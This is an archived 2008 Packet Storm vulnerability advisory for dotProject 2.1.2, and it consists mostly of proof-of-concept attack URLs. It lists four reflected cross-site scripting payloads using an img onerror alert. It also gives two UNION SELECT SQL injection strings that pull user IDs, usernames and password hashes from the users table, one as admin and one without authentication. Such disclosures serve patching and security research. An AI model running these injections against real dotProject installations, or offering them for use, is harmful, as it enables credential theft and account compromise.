dotproject-sqlxss.txt

2008-08-29T00:00:00
ID PACKETSTORM:69468
Type packetstorm
Reporter C1c4Tr1Z
Modified 2008-08-29T00:00:00

Description

                                        
                                            `#=======================================================================#  
.____ _________ ._.  
| | ______ _ __/ _____/ ____ ____| |  
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |  
| |__( <_> ) / / \ ___/\ \___\|  
|_______ \____/ \/\_/ /_______ /\___ >\___ >_  
\/ \/ \/ \/\/  
(http://wwwlowsec.org)  
#========================================================================#  
Author: C1c4Tr1Z  
Date: 28/08/08  
Application: dotProject 2.1.2 (29/06/2008)  
Product WebSite: http://www.dotproject.net/  
  
(*) With some of this exploits you need an ADMIN/ANONYMOUS account  
(*) I think that this proyect might be vulnerable to Cross-Site Request Forgery  
  
#========================================================================#  
#=============================[XSS]======================================#  
  
POC:  
/index.php?m=tasks&inactive=toggle"><img/src/onerror=alert(0)>  
/index.php?m=calendar&a=day_view&date=20080828"><img/src/onerror=alert(0)>  
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"><img/src/onerror=alert(0)>  
/index.php?m=ticketsmith&type=My'><img/src/onerror=alert(0)>  
  
#========================================================================#  
#=============================[SQL]======================================#  
  
POC as "ADMIN":  
  
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users  
  
POC as "ANONYMOUS" or other:  
  
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--  
  
#========================================================================#  
#========================================================================#  
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>  
(http://wwwlowsec.org)  
LowSec! Web Application Security (Lab).  
Deus ex Machina  
#========================================================================#  
`